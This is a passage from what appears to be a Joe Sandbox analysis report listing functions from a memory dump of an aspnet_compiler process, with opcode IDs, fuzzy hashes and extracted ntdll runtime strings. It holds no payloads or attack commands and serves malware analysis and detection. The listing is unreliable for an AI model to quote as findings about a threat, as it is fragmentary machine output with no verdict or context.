                                                              • Opcode Fuzzy Hash: 2cf3d5c79e0b6a4601833691ca0259181ee193dee239df025aeee2ead1328f8e
                                                              • Instruction Fuzzy Hash: 8790023160140842D10071584404B46001597E0301F56C116B0128654DC619C9527621
                                                              Function 01A22FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10d9369fd9ab193d321fe3c48d2ae509b0b1caf0fba18f58847f64989e752204
                                                              • Instruction ID: eb9a30871a0db67691e327825cebd751fa91bbb24a23e7d6dd38a6701b6f091b
                                                              • Opcode Fuzzy Hash: 10d9369fd9ab193d321fe3c48d2ae509b0b1caf0fba18f58847f64989e752204
                                                              • Instruction Fuzzy Hash: CE90023160180402D10071584808747001597D0302F56C111B5168555EC669C9927631
                                                              Function 01A22FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8949c07783033be8874902c5e781a7c46706c381aa1126b49be1074c5a16d67b
                                                              • Instruction ID: 2167dd51f1e39d47906726c5cdda8df23b187a1793f4b55ff7c05ce65b76dd58
                                                              • Opcode Fuzzy Hash: 8949c07783033be8874902c5e781a7c46706c381aa1126b49be1074c5a16d67b
                                                              • Instruction Fuzzy Hash: 88900221A0140042414071688844A064015BBE1211B56C221B099C550DC55D89666765
                                                              Function 01A22F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c477fbffae8f4c91e3ee56d3433bdfbd55627d39303b50c6ac5ac8c4e35a3145
                                                              • Instruction ID: d2f804fbd33e7f92727cac5befaa9dd6899f1d692c1575426cd5012683e347d9
                                                              • Opcode Fuzzy Hash: c477fbffae8f4c91e3ee56d3433bdfbd55627d39303b50c6ac5ac8c4e35a3145
                                                              • Instruction Fuzzy Hash: 6690023160180402D1007158481470B001597D0302F56C111B1168555DC62989527671
                                                              Function 01A22FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2d5dbdec7f7e7bf6f8f1e043ed2378a27d16b5aeedbb3c871df1cc660126ddc
                                                              • Instruction ID: 3f6b8e9ec51c0890db71b4303a2d19c3867be48ff1e8c9bc7c06468ed09f61d5
                                                              • Opcode Fuzzy Hash: c2d5dbdec7f7e7bf6f8f1e043ed2378a27d16b5aeedbb3c871df1cc660126ddc
                                                              • Instruction Fuzzy Hash: 06900221611C0042D20075684C14B07001597D0303F56C215B0158554CC91989626621
                                                              Function 01A22F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6fac5a568b75b9527b7f0bceba557f183d062b2af6acf16c95179e6436b501f0
                                                              • Instruction ID: e2dea06492df0d8403aff3fe1b3b52050da518b460b6db0d07b0d2d11ca15833
                                                              • Opcode Fuzzy Hash: 6fac5a568b75b9527b7f0bceba557f183d062b2af6acf16c95179e6436b501f0
                                                              • Instruction Fuzzy Hash: 7490026174140442D10071584414B060015D7E1301F56C115F1068554DC61DCD537226
                                                              Function 01A22F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2d5d1c6c70c0257996e35d2f544352c3e95294eb73e5d876e8ebd880278f3f8
                                                              • Instruction ID: 32892234f7644a215c61c685b9ee60fddd74b6cc5f7ae5acd2212f7dc870fc98
                                                              • Opcode Fuzzy Hash: b2d5d1c6c70c0257996e35d2f544352c3e95294eb73e5d876e8ebd880278f3f8
                                                              • Instruction Fuzzy Hash: FF90026161140042D10471584404706005597E1201F56C112B2158554CC52D8D626225
                                                              Function 01A22EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15a3f4d7318d6915532b324515bc6ca359a4e825a2b5bccdee56aa5d270be660
                                                              • Instruction ID: eb92ef0cdd945353d4be0367e3884209dacaee45e6155fd2966ecfb54085fe78
                                                              • Opcode Fuzzy Hash: 15a3f4d7318d6915532b324515bc6ca359a4e825a2b5bccdee56aa5d270be660
                                                              • Instruction Fuzzy Hash: 5490027160140402D14071584404746001597D0301F56C111B5068554EC65D8ED67765
                                                              Function 01A22E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b0b0a33db38829d5c91caa0150357dc20aed6d83d685be4bd11bb521b775196
                                                              • Instruction ID: 697f7548111cbf2279749d5a2bf76169088c0eda347b40fbf7a8e3cb0a106016
                                                              • Opcode Fuzzy Hash: 4b0b0a33db38829d5c91caa0150357dc20aed6d83d685be4bd11bb521b775196
                                                              • Instruction Fuzzy Hash: A4900221A0140502D10171584404716001A97D0241F96C122B1028555ECA298A93B231
                                                              Function 01A22EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f30d74b795e6d493bcce477de5aafa26592ce1b35de68910a47b3d471b55a366
                                                              • Instruction ID: 6cd5ddd1ce4ff3a4f4ffe860e3a9138ea4cb00e8f5badd6f3b11505ea65fe198
                                                              • Opcode Fuzzy Hash: f30d74b795e6d493bcce477de5aafa26592ce1b35de68910a47b3d471b55a366
                                                              • Instruction Fuzzy Hash: BA90026160180403D14075584804707001597D0302F56C111B2068555ECA2D8D527235
                                                              Function 01A22E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c84ee6b7c5a7d092b70c52ef74d437c6efe75d7cad9bec6930f32fc6cdf0453e
                                                              • Instruction ID: 55feef0a563d0788c4d7d8bea80b39857f483b2ad65aeeb25160721b3b375058
                                                              • Opcode Fuzzy Hash: c84ee6b7c5a7d092b70c52ef74d437c6efe75d7cad9bec6930f32fc6cdf0453e
                                                              • Instruction Fuzzy Hash: 7F90022170140402D102715844147060019D7D1345F96C112F1428555DC6298A53B232
                                                              Function 01A23090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fa6d6e79b48b41d83dce1a690570a2bc2c7b337b33d2d3806f32a54928698eb
                                                              • Instruction ID: 42f25f605c0ec525f0c27f318f0bc2bbec2cf5e4ef1fd24cf56a812aa1d14a1e
                                                              • Opcode Fuzzy Hash: 7fa6d6e79b48b41d83dce1a690570a2bc2c7b337b33d2d3806f32a54928698eb
                                                              • Instruction Fuzzy Hash: CB90022164140802D140715884147070016D7D0601F56C111B0028554DC61A8A6677B1
                                                              Function 01A23010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75eb8bc9e5a3b28b142620fda9e1c0349ed38885526728b3658970ba3541c7c3
                                                              • Instruction ID: bf854dd4e84bba4782b3b0be693dcee68dbecb4b4809a5ab006bda9f0f6fe7e2
                                                              • Opcode Fuzzy Hash: 75eb8bc9e5a3b28b142620fda9e1c0349ed38885526728b3658970ba3541c7c3
                                                              • Instruction Fuzzy Hash: E190022160184442D14072584804B0F411597E1202F96C119B415A554CC91989566721
                                                              Function 01A239B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5088f660858c41020f7d50db696411fef86b0ad6c1eb6e566614aa75252be521
                                                              • Instruction ID: 0a0e1627cbfee19cf9dcf01a9701234b581cc104f1e7198f0e74ed25fdeed4d2
                                                              • Opcode Fuzzy Hash: 5088f660858c41020f7d50db696411fef86b0ad6c1eb6e566614aa75252be521
                                                              • Instruction Fuzzy Hash: AF90022164545102D150715C44047164015B7E0201F56C121B0818594DC55989567321
                                                              Function 01A23D10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d4164ac56ce086e2b37a0fe42d1cf7a4f676eacd6fee2bd71227516accf04115
                                                              • Instruction ID: 0d73552fdfa5e124fdd9727daa92542d771c2e399ecde5c52c497a64c280e7dc
                                                              • Opcode Fuzzy Hash: d4164ac56ce086e2b37a0fe42d1cf7a4f676eacd6fee2bd71227516accf04115
                                                              • Instruction Fuzzy Hash: 8A90023160240142954072585804B4E411597E1302F96D515B0019554CC91889626321
                                                              Function 01A23D70 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: accaad74b4a9a778f09399df836490058cd5c8243973b20652666eb2e136912a
                                                              • Instruction ID: 73d322924501b4c4b8a23ec34689397536c7a860687e846af3e34059f98ac3b5
                                                              • Opcode Fuzzy Hash: accaad74b4a9a778f09399df836490058cd5c8243973b20652666eb2e136912a
                                                              • Instruction Fuzzy Hash: D890023560140402D51071585804746005697D0301F56D511B0428558DC65889A2B221
                                                              Function 01A22C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: c1b24cbec5792fd382b899b0fad3b6d31dc7ce697c07307ba33e4d4d09c12b9c
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Function 01A22890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: a775ecd4f8d6c286caa672fd4d0c7f0f2fe062797e1789543e716930152a21da
                                                              • Instruction ID: 7afe379f24508fada484ae006d6a3d229e590ff5ea9fd91601a20aa65ac3b238
                                                              • Opcode Fuzzy Hash: a775ecd4f8d6c286caa672fd4d0c7f0f2fe062797e1789543e716930152a21da
                                                              • Instruction Fuzzy Hash: B351F9B2B04126BFDB21DFAC8990A7EFBB8BB49240754C22AF459D7641D374DE0087E0
                                                              Function 01A92410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 867c317862d70e99c3516147b4ded8b0b238e4ff0bdc7278df0ab14fa9e735f9
                                                              • Instruction ID: 06a494d64ecd279aa5a18eeac43db9abccb5aedea037cd8ed4837fd60ca6d9d0
                                                              • Opcode Fuzzy Hash: 867c317862d70e99c3516147b4ded8b0b238e4ff0bdc7278df0ab14fa9e735f9
                                                              • Instruction Fuzzy Hash: A951F8B5A00645BFDF34DFADC990A7FB7F8EB84200B04C46AF596D7682D674DA808760
                                                              Function 01A17630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A54725
                                                              • ExecuteOptions, xrefs: 01A546A0
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A54787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A546FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A54655
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A54742
                                                              • Execute=1, xrefs: 01A54713
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: b9a3f316904a46ed4f6ed05af7f914b2175a1bbad2327f403916cedba2df271c
                                                              • Instruction ID: ee08f6a45a02e9adaeabd8bab27cb0675e896dcc6c70a13e23d15e933b938854
                                                              • Opcode Fuzzy Hash: b9a3f316904a46ed4f6ed05af7f914b2175a1bbad2327f403916cedba2df271c
                                                              • Instruction Fuzzy Hash: 23515D3160021ABAEF11EBE9ED95FBE77B8EF18700F0404ADE605A7181EB709E418F54
                                                              Function 01A2B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                              • Instruction ID: f894948a83b951bcc2d3f357a4970c459fd513be251a2781018e76c541f6a6c6
                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                              • Instruction Fuzzy Hash: 4E81AF70E062699FEF29CF6CC8917FEBBB2AF45320F1C4559D861A7291C77498408B71
                                                              Function 01A0F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A502E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A502BD
                                                              • RTL: Re-Waiting, xrefs: 01A5031E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 613d2e2bfd1a93f8269dea05624fa15ac52551f085b063bd0fd998f4181910ca
                                                              • Instruction ID: 5015f535675ba876511c17fea9017ca436a171922b8356b04b66b0713948f34d
                                                              • Opcode Fuzzy Hash: 613d2e2bfd1a93f8269dea05624fa15ac52551f085b063bd0fd998f4181910ca
                                                              • Instruction Fuzzy Hash: 13E1BF706087429FD726CF28D984B2ABBE0BF84724F180A1DF9A5DB2E1D774D945CB42
                                                              Function 01A1BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A57B7F
                                                              • RTL: Resource at %p, xrefs: 01A57B8E
                                                              • RTL: Re-Waiting, xrefs: 01A57BAC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: cb6e5dec69e1738c523877b4ffd841602254babb6b2d9a421e9c0915d18b457d
                                                              • Instruction ID: e4897291fc53a4f56247f85904fe3c6581e7486526a51920e2978a25662fd743
                                                              • Opcode Fuzzy Hash: cb6e5dec69e1738c523877b4ffd841602254babb6b2d9a421e9c0915d18b457d
                                                              • Instruction Fuzzy Hash: 9A41D1317057029FD724DF29D940B6AB7F6EF98720F100A1DF95AEB690DB31E8058BA1
                                                              Function 01A1B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A5728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A57294
                                                              • RTL: Resource at %p, xrefs: 01A572A3
                                                              • RTL: Re-Waiting, xrefs: 01A572C1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 59764f010eca5c650976c31d01c2af4a1c4a16f2db3ce252aad600e8d3a88494
                                                              • Instruction ID: b489672357395eb8de39a103302df1d7c1471e6fd944bb71b5cadf90afdc1190
                                                              • Opcode Fuzzy Hash: 59764f010eca5c650976c31d01c2af4a1c4a16f2db3ce252aad600e8d3a88494
                                                              • Instruction Fuzzy Hash: 06410031744202AFC720CF6ACC41B6ABBB5FB98750F144619FD55EB281DB31E8028BE1
                                                              Function 01A92300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 038176fc7cde7e10c8d4fa12af5fba39e7c2662be990fd46971b7ebdb1d3c6f9
                                                              • Instruction ID: 6e365a1516011dd4eb355f1800b62eca0aefa1209352ddb0c1066284aeaee67c
                                                              • Opcode Fuzzy Hash: 038176fc7cde7e10c8d4fa12af5fba39e7c2662be990fd46971b7ebdb1d3c6f9
                                                              • Instruction Fuzzy Hash: 94318676A00619AFDF20DF2DDD40BEF77F8EB54610F44455AE949E3240EB309A448BA0
                                                              Function 01A27D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                              • Instruction ID: d9169070a3625b9e75bfc46ed2c920488a4e2d5347d37ab1d6acaa8e928a51b0
                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                              • Instruction Fuzzy Hash: E291C471E042369BEB24DFADC881ABEBBB5FF64320F14451AE955E72C0D7349A40CB61
                                                              Function 019E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 3cd4f904a95608ca2d9d0d3aed2ade506a3b2f8849f63df6af092e88c40faf6c
                                                              • Instruction ID: 51aeb877277b1048c1c36fe62723bf87b73e5d6b131ad4c6061c7ea57d4b52c5
                                                              • Opcode Fuzzy Hash: 3cd4f904a95608ca2d9d0d3aed2ade506a3b2f8849f63df6af092e88c40faf6c
                                                              • Instruction Fuzzy Hash: C5810C75D002699BDB32CB54DD44BEAB7B8AB48754F0041DAEA1DB7280D7709E85CFA0